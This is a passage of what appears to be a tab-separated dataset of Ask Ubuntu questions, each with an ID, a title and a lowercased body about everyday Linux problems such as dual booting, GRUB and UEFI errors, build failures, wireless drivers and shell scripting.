439234	how do i prepare for dual boot windows7 & ubuntu	i am new to the ubuntu community and i apologize if this has been covered - i found some similar questions , but none quite like mine . my goal is to have a dual boot win7 or ubuntu 13.0 . here is where i am stuck : i have an ssd currently that i need to reformat and then partition but am not sure what tool i can use to do that . i have been looking for something similar to fdisk but i 'm not sure that i 'm even looking for the right thing . i think i should be booting from one of my optical drives to do this , is that right ? i think i should then proceed with data-wiping , partition setup , win7/ubuntu installations in that order . here are some details on my system and what i figured out so far : i have the ubuntu 13.10 desktop installation disk and a number of win/linux utilities however i seem to be missing a program that i can boot from one of my optical drives with . my system drive is a 480gb corsair ssd on and asus p8z77 . not sure this matters but just in case it is helpful in some way : the ssd drive currently has windows 7sp1 but it was damaged after an ie10 update that i 've rolled back but continue to suffer issues which point to a damaged win7 installation .
439235	ca n't ping machine on lan from 1 out of 3 kubuntus	i have three kubuntu systems running , one 12.04 and two 13.10 . i have an hp mediavault ( a network attached storage device ) on my lan . on the 12.04 and one of the 13.10 's , i can ping hpmediavault ; on the other 13.10 i get the `` unknown host '' error . i 've installed winbind on all three systems and set the hosts entry in /etc/nsswitch.conf to hosts : wins files mdns4_minimal [ notfound=return ] dns mdns4 the misbehaving system has a wired connection ; the other two have wireless connections . that 's the only difference i 'm aware of that might affect this behavior . i can ping the mediavault on the third system by using its ip address . so what do i need to do to get the third system to do its ping ?
439236	possibility of triple screen setup with two graphic cards	i 'm trying to get my favorite triple display setup ( 3x1 portrait █ █ █ ) running under ubuntu/xubuntu 13.10 yet had no gratifying results so far . ubuntu crashed compiz repeatedly . and only offered twinview plus xterm at best . xinerama failed to work too . setup consists of 2 nvidia quattro fx 580 and 3 1920x1200 displays ( 2*dvi 1*displayport ) . each of the cards is capable of running two displays and the setup worked well in mosaic mode as a unified display before . any recommendations for a promising drivers/versions & window manager combination ?
439242	issues with unity and gnome	usually my computer loaded the desktop on ubuntu , however starting today , i can not load the desktop . the only interface i can get , is if i click the power button ( physical ) it takes me to the shutdown menu . however lxde works perfectly as normal so i dont believe it is a disk-based issue . please help and thanks in advance ! : )
439245	new install on my pc	i am trying to load ubuntu on my pc . i have a amd 64 chip . when i run the boot dvd i just get a blank screen . would it be a hardware problem that will not allow ubuntu to load ?
439246	changed root password on my server , now ca n't login anymore	i decided to change the root password that came preset on a fresh digitalocean server ( ubuntu 12.04 ) . i used the first answer to this post : how to change root password in ubuntu ? which is : sudo -i passwd ( set my new password on prompt ) sudo passwd -dl root now i ca n't login as root on tty1 on my server , nor can i access my server on filezilla , etc ... what did i do wrong , and more importantly how can i recover my root login ? thank you for your help .
439250	make fails due to undefined reference to symbol 'uncompress '	i tried to compile the latest `` lordsawar '' and quite at the end i received this error message : libtool : link : g++ -wall -dpo_path=\ '' /usr/local/share/locale/\ '' -g -o2 -o lordsawar-pbm pbm.o main.o pbm-game-client.o game-client-decoder.o chat-client.o ../../src/.libs/liblordsawar.a -l /usr/lib/x86_64-linux-gnu -lsdl -lgtkmm-2.4 -latkmm-1.6 -lgdkmm-2.4 -lgiomm-2.4 -lpangomm-1.4 -lgtk-x11-2.0 -lglibmm-2.4 /usr/lib/x86_64-linux-gnu/libcairomm-1.0.so /usr/lib/x86_64-linux-gnu/libsigc-2.0.so -lgdk-x11-2.0 -latk-1.0 -lgio-2.0 -lpangoft2-1.0 -lpangocairo-1.0 -lgdk_pixbuf-2.0 /usr/lib/x86_64-linux-gnu/libcairo.so -lpango-1.0 /usr/lib/x86_64-linux-gnu/libfreetype.so -lfontconfig -lgobject-2.0 -lglib-2.0 -lxslt -lxml2 -ltar /usr/lib/x86_64-linux-gnu/libexpat.so /usr/bin/ld : ../../src/.libs/liblordsawar.a ( xmlhelper.o ) : undefined reference to symbol 'uncompress ' /lib/x86_64-linux-gnu/libz.so.1 : error adding symbols : dso missing from command line collect2 : error : ld returned 1 exit status zlib is installed on my system . i zlib1g i zlibc i 'm on ubuntu 13.10 . i 'm unfortunately not so experienced in compiling stuff . anybody has an idea ?
439253	no mesa folder under the i386-linux-gnu folder ( ubuntu12.04 64bits )	i meet some problems when i try to build the android source code ( cis ) on ubuntu12.04 , 64bits . i found one suggestion on the internet : sudo ln -s /usr/lib/i386-linux-gnu/mesa/libgl.so.1.20 /usr/lib/libgl.so but there is no mesa folder under i386-linux-gnu on my computer , there is a mesa foler under x86_64-linux-gnu folder . but i ca n't use the mesa under x86_64-linux-gnu , for it is incompatible . does anyone know the reason ? besides , my errors are : incompatible /usr/lib/libgl.so when searching for -lgl /usr/bin/ld : can not find -lgl collect2 : ld returned 1 exit status make : *** [ out/host/linux-x86/obj/lib/libgles_v2_translator.so ] error 1 make : *** waiting for unfinished jobs ... . collect2 : ld returned 1 exit status make : *** [ out/host/linux-x86/obj/lib/libgles_cm_translator.so ] error 1 /usr/bin/ld : skipping incompatible /usr/lib/gcc/x86_64-linux-gnu/4.6/../../../libgl.so when searching for -lgl /usr/bin/ld : skipping incompatible /usr/lib/libgl.so when searching for -lgl /usr/bin/ld : can not find -lgl collect2 : ld returned 1 exit status make : *** [ out/host/linux-x86/obj/lib/libegl_translator.so ] error 1
439254	lg laptop not seeing my hdmi graphics card	im running ubuntu 12.04 lts and everything works well , great in fact , except one thing , the laptop ( lg r710 ) wont connect to an external tv with hdmi . another person who worked on my computer said ubuntu was just not connecting to the hdmi or graphics card at all . as if they werent even activated ... any ideas on how to solve the issue ? is there a way to test the graphics outputs ? thanks m
439256	ubuntu 13.10 can not detect galaxy s4	ubuntu wo n't recognize my s4 and on the phone it does n't realize it 's connected either , it just shows that it 's charging . i 've read posts such as ubuntu ca n't see my android phone ! but that should n't be a problem as 13.10 supports mtp . any ideas as to what 's going on ? it came up with `` could n't find matching udev device '' as an error one time , but i ca n't get it to show up again . also , i tried installing mtp-tools and restarting but that did n't work either . edit : if you 're going to downvote this could you at least comment why ?
439257	unable to build gem5 because of fatal error	tried to build gem5 by $ scons build/arm/gem5.opt but failed because of fatal error : google/protobuf/io/gzip_stream.h : no such file or directory
439261	grub chainloader does n't work with windows 8	what should i enter below to run windows 8 from the grub menu ? i 'm a total newbie , and it does n't work from the beginning somehow . ubuntu works perfectly fine , but windows gives me some error message like incorrect something ( secure boot forbids loading module and unknown command 'drivemap ' ) . i know i need to change something here to make it work , but i do n't know what . menuentry `` windows 8 '' { set root = `` ( hd0,4 ) '' chainloader +1 } i got a purple screen with this error message : error : secure boot forbids loading module from ( hd3 , gpt0 ) /boot/grub/normal.mod . error : no such device : 861287c9128786a9 . error : unknown command ‘drivemap’ . error : no such partition . press any key to continue ... _ update : i disabled secure boot , and again i got a purple screen with the following error message : error : unknown command ‘drivemap’ . error : invalid efi file path . press any key to continue ... _
439264	unable to get updated package information apt-get update xubuntu 12.04	hello i 'm having a problem with updating my system . i 'm running precise 12.04 when i run apt-get update , i get the following error at the end of the apt-get update . failed to fetch http : //archive.canonical.com/dists/precise/partner/binary-i386/packages 404 not found [ ip : 91.189.92.150 80 ] i 've tried changing servers and this does n't work either . it gives me a message to check my internet connection which is solid . so now when i open update manager it says the last time the package information was updated was 7 days ago . so it seems i ca n't update my system anymore . i was going to copy below the read out from the terminal when i run sudo apt-get update but it wo n't let me post a question with more than 2 links in it because my reputation is n't high enough and the apt-get update read out is full of links ... i 'm very new to linux and xubuntu , can someone please help me . update - solved i found a solution to my problem here . http : //ubuntuforums.org/showthread.php ? t=2046145 at some point i must have screwed with my sources list . i followed the instructions provided and basically copy/pasted the sources list provided in the answer by lisiano located at the above link and ran apt-get update and it worked . sweet as cheese . thanks to lisiano for the step by step solution .
439267	how to make a directory name with quotes in it , such as `` what 's for dinner ? ''	i 'm having a hard time making this directory in the terminal . i tried mkdir ' '' what 's for dinner ? '' ' but i think that does n't work because of the apostrophe in what 's . so i tried escaping that apostrophe : mkdir ' '' what\ 's for dinner ? '' ' but it still does n't work . any ideas ? edit : i want to keep the double quotes in the directory name .
439270	how do i learn command line ?	the last time i typed anything into a computer `` command line '' was on a commodore 386 . basic . i am trying to understand how an install should work . i found software to mount a joystick . i double clicked everyone down the list and only got one thing ? the package reads that i need four things that should be there but ... the following utilities are provided to calibrate and test joysticks : ffcfstress , ffmvforce , fftest – test force-feedback devices ffset – set force-feedback device parameters jscal – calibrate joystick devices , reconfigure the axes and buttons jscal-store , jscal-restore – store and retrieve joystick device settings as configured using jscal jstest – test joystick devices < < < this is the only one to show up in the start menu ! when i look them up i have several binary docs but have no idea how to get them in the command line .
439273	my 3954abg wifi card wont connect	i recently installed ubuntu 13.10 on my lenovo 3000 n100 laptop . running lspci in a terminal program , i discovered my wifi card is an intel pro/wireless 3954abg . the wifi card has been recognized , but will not connect . any help would be appreciated .
439277	can not access launcher or onboard when unetbootin asked for password	when i try to start unetbootin it usually asked for password . but when it asked for password , i can not access luncher , and the onboard is also not access able during this time . on the other hand , in case of synaptic it ask for password , but i have access to luncher and i can also use onboard . can any one tell me how to access onboard from luncher icon when unetbootin asked for password . thank you .
439281	ubuntu 14.04 beta update compatibility	i would like to install ubuntu 14.04 on my notebook and i am wondering if the beta could be easily updated to later release clients ? are there any official sources that ensure update compatibility ? due to some driver conflicts ubuntu 14.04 seems to be the only distribution that runs without major problems on my notebook and i am really annoyed of using windows . i just use this notebook for coding and other working purposes . thanks
439288	ac power plug/unplug events	running ubuntu server 13.04 ( kernel 3.8.0-19-generic ) * . i want to react when ac power is applied or removed . i can query the state correctly either through acpi -b or cat /sys/class/power_supply/online . i would like to react automatically but it appears that ac power events through acpid are not working ( i do n't see anything coming through on acpi-listen or connecting to acpid.socket , even if i reset acpid and enable logging or debug . it looks like acpi support is partially broken/in transition in ubuntu , but i have n't been able to find what component is intercepting these events .
439289	cat to named pipe causes hang	i 'm attempting some streaming with ffmpeg , and i think i have finally found the solution i need to screen blanking . this requires writing png 's to a named pipe and then having ffmpeg read them as an overlay . however , i seem to be having a weird issue . # ! /bin/bash mkfifo /tmp/stream_pipe cat /path/to/transparent/or/splash/screen.png > stream_pipe echo `` done ! '' in this example , echo `` done ! '' never actually runs . so , i moved to the terminal and tried the same thing , and sure enough the cat command hangs indefinitely . i do n't recall ever having issues with catting to named pipes and , indeed , i saw a lot of named pipe references that use just this . what could possibly be going wrong here ? should n't cat exit once it has finished writing the file to the pipe ? the file being written is just a normal png file , so this has really got my puzzled . or is it that cat attempts to close the pipe upon writing perhaps ? this would make sense why it would hang since it 's not a legitimate file , but i would imagine that cat would know the difference or would n't care . edit : cat $ file | echo -n > /tmp/stream_pipe exhibits the same behavior
439291	how to recover a deleted user account	i have deleted a user account using the command userdel -r george . it deleted that user with their files . i need to restore that user and their files , is it possible ? how can i achieve it ?
439297	uninstalling windows xp	i have a dell built in 2003 running windows xp home . i recently installed ubuntu 12.04 onto a partition on my hard drive . now i am not able to boot with xp , only ubuntu . ( on boot up screen , when i choose to boot with xp , it continuously loops back to boot up menu ) i would like to backup all my files within xp and totally delete xp os leaving the complete hard drive for ubuntu . how do i go about doing this ? where do i begin ?
439298	installing ubuntu on new hard drive	i just got a new motherboard to get my old pc up and running . for some reason i can not get any usb drives or cd/dvds to boot , however i do have an older hard drive with ubuntu already on it and it boots right up . this hard drive is old though , not much space and i think its on its last legs . i have several other hard drives , can i put a 2nd one in my computer and install ubuntu on it while the computer is booted up and then take out the old hard drive and boot straight from the new one ?
439299	how to take screenshot in jpeg format using ubuntu tools only	i need to develope a cpp software to capture screenshot ( in jpeg format ) and send images 's bytes through a socket . i created correctly the server socket but i do n't know how to take a screenshot programmatically using only ubuntu preinstalled software . using gnome-screenshot : std : :system ( `` gnome-screenshot -f screenshot '' ) ; // does n't work from cpp from terminal gnome-screenshot -f screenshot // works but store image in png format ( i need jpeg ) is that the correct tool to use ? is there a better tool that can i use ? thanks ! gnome-screenshot utente @ uduntudev : ~/scrivania/xiboagent $ gnome-screenshot -f screen.jpg utente @ uduntudev : ~/scrivania/xiboagent $ file screen.jpg screen.jpg : png image data , 1024 x 768 , 8-bit/color rgb , non-interlaced utente @ uduntudev : ~/scrivania/xiboagent $
439300	will ubuntu 14.04 have improved uefi support or will we be using boot-repair for the next 5 years ?	everyday i see questions on here about someone unable to get ubuntu to play nice with uefi . they are soon reminded they are n't in kansas anymore , told to follow the yellow brick road , see the wizard , and ask him for boot-repair . i 'm not complaining i understand the widespread adoption of uefi hardware is new and developing stable software takes time , but i am wondering if any progress has been made that will be incorporated into the new 14.04 long term support release as i 've been unable to find any news on this . i did stumble upon some postings about improved secure boot support , but i 'm more concerned with uefi support itself than the secure boot feature which i do n't use .
439301	adobe flash not working ?	hi friends i am having a problem whenever i try to play videos on you tube or any other site i always get an error adobe flash player is required to display some contents on this page but the problem is that i already have adobe flash plugin i downloaded it from software center . but still it does not works can someone please help me and when i tried downloading for ubuntu from adobe site it opened software center and a message was there : there isn’t a software package called “adobe-flashplugin” in your current software sources
439303	how to make klipper work on ubuntu 12.04	how to make klipper work on ubuntu 12.04 ? i was using klipper a lot . but it is not working on ubuntu 12.04 . it shows the klipper icon but nothing will appear if i click on it or nothing will happen if i press the keyboard shortcut . do i need to install some other dependencies ?
439306	drives will not mount on startup	i am simply trying to have a few drives mount at startup of ubuntu 12.04 . i have tried entering the commands in startup applications ( as explained in this tutorial ) : udisksctl mount -- block-device /dev/disk/by-uuid/32249c132bd865 ( shortened ) udisksctl mount -- block-device /dev/disk/by-uuid/fce456f556b21e ( shortened ) udisksctl mount -- block-device /dev/disk/by-uuid/6a8c95be8c958b ( shortened ) after reboot the drives are not mounted . i can mount them simply by clikcing on the icons in pcmanfm or nautilus , but they remain unmounted at startup . i have also tried to edit the /etc/fstab file as drescribed in the answer here but can not locate any folder named `` fstab '' , only a folder named `` fstab.d '' which seems to be empty . i should also mention that the filesystems are ntfs any help would be appreciated .
439314	bash temporary log files	i am a newbie at shell programming . as i need to deliver a professional shell program , can someone help to clarify the following three topics : standard way of creating temporary files and then removal of these files after the program 's execution . how to be certain that these temporary files are created during current program execution , so that we do n't accidentally delete other temporary files created by another instance of the same program . creation of log files for logging any errors that occur during the command execution . any help is much appreciated .
439315	the partitions ca n't be merged because they do n't see each other	i have the following where /dev/sda2 - windows7 and `` unallocated '' is the partition i want to add to my current linux installation at /dev/sda6 . but i ca n't do this for some reason . even when i format unallocated partition and then i click resize , i can only make it smaller . the same thing is true for /dev/sda6 . in other words , /dev/sda1 and /dev/sda6 do n't see each other . so how can i merge /dev/sda1 into /dev/sda6 ? there is no much menu item `` resize '' on /dev/sda3 , although it 's not mounted : a @ a ~ $ sudo umount /dev/sda3 umount : /dev/sda3 : not mounted a @ a ~ $ sudo umount /dev/sda6 umount : /dev/sda6 : not mounted a @ a ~ $ sudo umount /dev/sda5 umount : /dev/sda5 : not mounted update2 : $ sudo lsblk name maj : min rm size ro type mountpoint sda 8:0 0 931.5g 0 disk ├─sda2 8:2 0 829.8g 0 part ├─sda3 8:3 0 1k 0 part ├─sda5 8:5 0 3.6g 0 part [ swap ] └─sda6 8:6 0 98.2g 0 part sdb 8:16 1 14.6g 0 disk └─sdb1 8:17 1 14.5g 0 part /cdrom sr0 11:0 1 1024m 0 rom loop0 7:0 0 1.1g 1 loop /rofs clicking on /dev/sda3 and choosing `` resize ''
439321	monitor profiling in 12.04lts	tft central , a site that reviews hardware and software has downloadable monitor/display icc profiles . what is the process of installing and using a downloaded icc profile for my monitor ? i am using 12.04lts 64-bit .
439322	how to stop flash installation prompter in chromium ?	i want to stop the prompter at the top of the webpage . this is so annoying since i do n't want to install flash . and it keeps coming back up for every webpage i visit which has flash content .
439323	gpt partitions for windows 7 and ubuntu dual boot on 4tb hdd ( uefi mb )	i have an empty hdd with 4tb capacity . i am trying to create the gpt partitions using gparted so i can install windows 7 and ubuntu . what i want is to be able to utilize the entire 4tb space . i want to allocate 200gb to windows , 200gb to ubuntu and the rest i want to leave it as a shared space for both os . i have seen numerous answers on how to install ubuntu on a windows machine but i think the best way of doing it starting with a clean hdd ( large one > 2tb ) is not very clear . all answers greatly appreciated . -goutham
439326	force ubuntu to install legacy ?	so here is the issue i am having . my bios boot mode is set to legacy+uefi and my windows 8.1 installed as legacy , however , when i try to install ubuntu , it attempts to install as uefi and does n't detect windows and ca n't install grub properly . so i was wondering if there was a way to force ubuntu to install as legacy or if i need to completely reinstall everything . also , this is a custom built computer . the motherboard is an msi z87-gd65 gaming motherboard .
439331	boot failure in window 8.1 ( hp )	how to install ubuntu 13.10 in windows 8.1 64 bit.i had a problem , when i installed ubuntu in windows 8.1 , grabber file is not supported in my windows 8.1.please guide me .
439335	how does the host assigns driver to a usb device ?	where does the enumeration happen ? in /usb/core/hub.c ? after the enumeration occurs ( the host detects and identify the usb device ) , how does the host loads the respective driver . is it by using the a. class/subclass/protocol or b. vid/pid how do i come to know ?
439339	how to check power consumed by a c program ?	i need to find out power consumed by a c program . please guys help me out with your experience it 's kind of important for me . i have tried powertop command , but i am not able to get power consumed by a c program .
439344	if one was to install cinammon on ubuntu , what differences would stand ?	latest ubuntu size : about 880mb . latest mint size : about 1.2gb . what gives ? searching , i found that almost all the differences mentioned are regarding cinammon vs unity . theoretically if one was to install cinammon on ubuntu , what differences would he notice between his ubuntu distro and his mint distro ?
439345	how to restore data from ubuntu 12.10 localhost	after upgrading from ubuntu 12.04 to 12.10 i have a black screen , do n't see any thing i well remove this version and install a new one . but i need my all projects from local host . it 's important .
439346	difference between package `` nvidia-331 '' and package `` nvidia-331-updates ''	what is the difference between package `` nvidia-331 '' and package `` nvidia-331-updates '' mfg muessli
439350	problem installing gazebo on ubuntu 12.10 ( broken package )	i was trying to install gazebo in my ubuntu 12.0 , following the steps in `` gazebosim.org/wiki/1.2/install '' . however , after i input sudo apt-get install gazebo in terminal as step 4 suggested , it shows up the following errors : reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : gazebo : depends : libboost-thread1.46.1 but it is not installable depends : libboost-signals1.46.1 but it is not installable depends : libboost-system1.46.1 but it is not installable depends : libboost-filesystem1.46.1 but it is not installable depends : libboost-program-options1.46.1 but it is not installable depends : libboost-regex1.46.1 but it is not installable depends : libboost-iostreams1.46.1 but it is not installable depends : libcegui-mk2-0.7.5 but it is not installable depends : sdformat ( > = 1.4.7~ ) but it is not going to be installed e : unable to correct problems , you have held broken packages . i 've tried sudo apt-get install -f to fix the broken packages , but its still not working . please , any suggestions or commnets will be appreciated xd eason.li
439351	how to list servers running in ubuntu machine along with their port numbers ?	among some other servers installed in my ubuntu system , one is the dictd server . the documentation says it uses port 2628 . running sudo nmap 192.168.1.74 -p 0-9000 results in : nmap scan report for 192.168.1.74 host is up ( 0.000010s latency ) . not shown : 8995 closed ports port state service 21/tcp open ftp 80/tcp open http 111/tcp open rpcbind 139/tcp open netbios-ssn 445/tcp open microsoft-ds 3128/tcp open squid-http it does not list port 2628 used by dictd server ( which is up , i checked with ps . ) i do n't know what 's wrong with the command that i used ! my question is how can i list all servers ( like dictd and others including some games serves ) along with their port numbers ? ( preferably using console tools )
439353	keyboard language is different every log in	i set my keyboard to german - and it is the only language selected . nevertheless , every time i log in , the keyboard language is somehow english . ( this bug is similar to this one : keyboard language self switches - but it is not the same . ) i also set setxkbmap de as a startup application , but it only worked once . since then it is english every time i boot my laptop . i am running 13.10 64 bit - and i checked all the obvious solutions ( keyboard layout etc. ) . is there any solution or is it a bug ?
439355	unable to access camera with adobe flash , in chromium . ubuntu 12.10	so when trying to goto a video chat site my webcam will not work properly . when i go to the adobe website to change my settings it wont let me enable the camera . any ideas
439358	how do i get function keys to work ?	i ca n't use the volume keys on the keyboard of my acer c7 chromebook . actually , none of the function keys work , including brightness .
439360	makefile compile	i have to compile ctorrent using makefile , but i always have the same error : make [ 1 ] : entering directory `/home/g507565/downloads/ctorrent-dnh3.3.2' test -z `` /usr/local/bin '' || mkdir -p -- `` /usr/local/bin '' /usr/bin/install -c 'ctorrent ' '/usr/local/bin/ctorrent' /usr/bin/install : can not create regular file `/usr/local/bin/ctorrent ' : permission denied make [ 1 ] : *** [ install-binprograms ] error 1 make [ 1 ] : leaving directory `/home/g507565/downloads/ctorrent-dnh3.3.2' make : *** [ install-am ] error 2 i do n't know how to do it . any help please .
439363	disconnects with a realtek rtl8191su under xubuntu 13.10	i have installed xubuntu 13.10 ( fresh install , from a live cd ) on a 10 years old desktop pc , with a usb wifi dongle ( chipset realtek rtl8191su ) . the dongle is recognized fine , but it fails to log on the wifi network on boot , and it disconnects frequently ( network-manager does now show the disconnect , but i can not surf on the web any more ) . each time i have to unplug and plug the usb stick for the connection to work again . the stick works fine under windows xp . i tried to switch from networkmanager to wicd , but it does not help . i have tried to install the drivers from realtek , but i have a compile error . any ideas ?
439364	problem to set java_home	in ~/.bash_profile i set the following : export java_home=/usr/lib/jvm/java-7-openjdk-i386/bin/java export path= $ path : /usr/lib/jvm/java-7-openjdk-i386/bin after saving and close i ran : sudo su source .bash_profile echo $ path brings root @ ubuntu : ~ # echo $ path /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games : /usr/lib/jvm/java-7-openjdk-i386/bin which java is /usr/bin/java but if i start smartgit there 's the following warning ip @ ubuntu : /usr/share/smartgithg/bin $ ./smartgithg.sh warning : /usr/lib/jvm/java-7-openjdk-i386/jre/bin/java/bin/java does not exist why does n't 'which java ' point to the new java i installed ? and why does contain $ path bin/java/ twice ?
439366	after boot-repair `` please install an operating system on your hard disk ''	i just installed ubuntu 13.10 alongside windows 7 . because i could only boot windows 7 i started ubuntu live again from the dvd and ran boot repair . now the computer is not able to boot anything . the error message `` please install an operating system on your hard disk '' occurs . the boot repair output . i 'm not even able to get into the 'normal ' bios anymore : first time it worked and i could have changed the boot-options , but i left without changing anything . now , when i want to enter the bios , only system diagnostics appears with four options to chose from .
439368	none of my canon printers work with ubuntu 13.10	i have in my office many canon printers such as : ir 2016 ir 2018 ir 2420 mf4300 mf4410 mf 4330 lbp 6000 note ubuntu by default installed all the hp printer drivers .
439371	how do i set group permissions on a shared folder ?	i have created a folder called shared1 which i am going to share . after that , i have created a group named group . currently no users are added into group group . i need to assign read and write permissions to folder shared1 with only the group group having access . how do i do this ?
439374	mounting an image which is connected in the cdrom of ubuntu vm	i have an iso file connected with the cd drive of an ubuntu vm . now i am trying to mount it . i have tried mount -o loop /dev/cdrom /mnt/cdrom and it mounts properly but when i try to execute any command on the extracted file it says mounted as readonly . i have tried mount -o remount , rw /dev/cdrom /mnt/cdrom but it says specify file type . i have tried mount -t auto -o remount , rw -force /dev/cdrom /mnt/cdrom it again says specify a file type i have tried mount -t ext -o remount , rw -force /dev/cdrom /mnt/cdrom it says bad option please let me know what i have to do to mount /dev/cdrom
439377	selecting multiple files with in bash	i want to use scriptreplay with multiple log/timing files located in the same directory . the script i have right now looks like this : select timings in /mnt/home/ $ user/shell_logs/* ; do clear scriptreplay $ timings done ; ; esac is there a way to select two files ( the log and the timingfile of that log ) at the same time ?
439379	how to reconnect to wifi via ubuntu 's default method	i want to reconnect my wifi , but ideally something as simple as emulating the click on the wifi symbol on the top right . this is because i am behind a captive portal , and sometimes it times out , and it needs a reconnect in order to be available again , which i 'd like to do via cron , but otherwise i really like gnome 's utility . similar questions have been asked , but they all seem to resolve around some version of sudo ifconfig wlan0 down sudo ifconfig wlan0 up that does n't quite seem to do what i want . for example , after running sudo ifconfig wlan0 down gnome does n't even recognize that the wifi is disconnected ( even though internet obviously does n't work any more ) . is there a way to address whatever system it is that gnome is using ? thanks
439385	how to start xfce4 session inside upstart user session ?	i would like to use a upstart user session to run some jobs under user control . my machine has mythbuntu installed which means i have lightdm which starts an xfce4-session . how should i replace my current configuration to have my xfce4-session running under init -- user ? at the moment my /usr/share/xsessions/mythbuntu.desktop runs /usr/share/mythbuntu/session.sh which does exec startxfce4 which runs /etc/xdg/xfce4/xinitrc which in turn runs xfce4-session . i 'm not sure into which part of this chain to execute init -- user and then how to resume the chain . do i need to create a user job that executes whatever i replaced with init -- user ?
439388	setup subdomain to service	i 've managed to get 2 subdomains working following the second post in this thread , but it only works for apache . i would like to have a subdomain pointing to a certain service running on the server . for example i have a cod4 ( port 28960 ) and a minecraft server ( port 25565 ) running . both are accessible by entering domain.com . i would like to change it so you have to enter cod.domain.com and mc.domain.com to enter the server . it should refuse access if you just enter domain.com ( although it should still give you the site if you enter it using the browser ) . is this possible and if so , how ? using google i was not able to find any tutorials . i could only find tutorials for apache ( which is not what i want ) . using ubuntu 10.04 x64 .
439394	how to add a package to kernel to make it default package ?	i want to add xclip package to kernel to make it default package . means if i give mine custom version of kernel to someone to install then xclip package should also be installed with kernel . they do n't have to use `` apt-get install xclip '' command to get it . how is it done ?
439398	cant install my tatadocomo photon max on ubuntu 13.10 ?	hello everyone im using my laptop with 2 os . one is windows 8 and other is ubuntu 13.10 saucy . i have a wifi in my house but when i go outside i use my tata docomo photon max datacard in windows .i want to install its driver and connecter in ubuntu . in windows 8 it was automatically downloaded by inserting my datacard but in ubuntu it is not receiving but i can get it under network settings . but i cant connect to it . in windows we have to connect it using its connecter it is like in the pic here i want to know how to install this software when i opened my datacard in windows i got following files ( these files are pasted in my ubuntu data or windows d drive ) my lsusb output is as follows : ashwin @ jarvis : ~ $ lsusb bus 002 device 005 : id 19d2 : fffe zte wcdma technologies msm bus 002 device 002 : id 8087:0020 intel corp . integrated rate matching hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 003 : id 0c45:641d microdia 1.3 mpixel integrated webcam bus 001 device 002 : id 8087:0020 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub ashwin @ jarvis : ~ $ i want to use my data card please help me in it .
439400	jre for ubuntu 12.10 other than openjdk and oracle jre	i am trying to get jodin , a java implementation of odin suite for samsung phones to work in ubuntu 12.10 . on the first run of jodin , i got a message stating that i need a newer version of java runtime environment . so i first updated open-jdk-jre to newest version . as this did n't helped , i installed oracle 's jre using this tutorial . this worked a little , as now jodin runs with half of it 's features . so i now want to install some other jre.can you state some under development jres with a link to there websites ( or even better , a ppa ) ?
439402	why do only ipv6 autoconf services get listed from wlan	i 've installed squid-deb-proxy on a server which is connected to my router 's lan . if i browse available zeroconf services from my laptop connected directly to the lan , i see both ip4 and ip6 squid-deb-proxy advertised : $ avahi-browse -a ... + eth0 ipv6 squid deb proxy on mythbox _apt_proxy._tcp local + eth0 ipv4 squid deb proxy on mythbox _apt_proxy._tcp local but if i disconnect my laptop and try again via the wlan , i only see the ipv6 service : $ avahi-browse -a ... + wlan0 ipv6 squid deb proxy on mythbox _apt_proxy._tcp local i can still ping the ip4 address without problems , it seems to just be the mdns ? also , the server ( on the lan ) can see all the ip4 mdns entries for the other ( wlan ) machines . why do i only see the ipv6 services from the wlan ?
439403	differences between installer disc images ?	looking at the quantal image download site i notice two different amd64 images . what 's the technical difference between ubuntu-12.10-desktop-amd64+mac and ubuntu-12.10-desktop-amd64 ? of course the first one is optimized to install on apple machines , while the latter is more general . but what is the difference that makes it more suitable for macs ?
439404	chromium message : google api keys are missing and can not sign in to chromium	i installed chromium on my ubuntu 12.04 using sudo add-apt-repository ppa : saiarcot895/chromium-dev sudo apt-get update sudo apt-get install chromium-browser now whenever i run it i get the message google api keys are missing some functionality of chromium will be disabled and i can not sign into my google account to get all my bookmarks . if i press learn more ... it takes me to a page where it asks me to subscribe to chromium dev channel , search for my api key and provide keys at build time or run time . but i do n't know how to do that ... please help ...
439407	how to submit a feature request for chmod linux command	note : i believe this question does n't fit the so guidelines for question types , but if you can , please move it to appropriate section of the se network or please tell me where it would be appropriate to put this question . the question is how can i suggest a new feature request ( or submit a patch with that feature implemented ) for the unix-like tool `` chmod '' ? the feature i would like to see in the chmod tool is to specify an option ( e.g . `` -d '' ) which would make chmod only change modes of directories , not touching regular files . this would make it more convenient than using this approach , which makes use of the `` find '' tool : find /opt/lampp/htdocs -type d -exec chmod 755 { } \ ; and find /opt/lampp/htdocs -type f -exec chmod 644 { } \ ; thanks in advance .
439410	how to make `man` work for shell builtin commands and keywords ?	i use the man command all the time when i want to get information about a specific command . but this does n't help me too much when that specific command is a shell builtin . for example : man cd returns : no manual entry for cd my question is : it is possible to make man also work for all shell builtin commands ( like cd , alias , history , etc . ) , and keywords ( like if , while , [ [ , { , etc . ) ?
439413	where can i get the latest driver for lexmark x5630 on ubuntu 12.04 ?	tried loading the driver from the lexmark site but no go ! ubuntu picks up the printer but does n't have the correct driver for this model . help please ! ?
439414	about ubuntu app showdown 2014	can somebody please tell me how to submit my app which is already published in the ubuntu store , to ubuntu app showdown . this page says you must register your submission in the app showdown form ( to be put online soon ) . when form will be online .
439416	get-edid always fails , yet ubuntu detects monitor make/model in system settings	i am trying to writer some scripts to detect what monitor is plugged in and when . i am not sure if i am going down the correct path , but i notice that no matter what i do trying to use 'get-edid ' always fails with the following output : sudo get-edid this is read-edid version 3.0.1 . prepare for some fun . attempting to use i2c interface looks like no busses have an edid . sorry ! attempting to use the classical vbe interface performing real mode vbe call interrupt 0x10 ax=0x4f00 bx=0x0 cx=0x0 function unsupported call failed vbe version 0 vbe string at 0x0 `` o '' vbe/ddc service about to be called report ddc capabilities performing real mode vbe call interrupt 0x10 ax=0x4f15 bx=0x0 cx=0x0 function unsupported call failed reading next edid block vbe/ddc service about to be called read edid performing real mode vbe call interrupt 0x10 ax=0x4f15 bx=0x1 cx=0x0 function unsupported call failed the edid data should not be trusted as the vbe call failed error : output block unchanged i 'm sorry nothing was successful . maybe try some other arguments if you played with them , or send an email to matthew kern < pyrophobicman @ gmail.com > . the interesting part though is that if i go to the display settings in ubuntu , it detects the monitor make/model/size . i am confused as to how ubuntu is doing this if get-edid always seems to 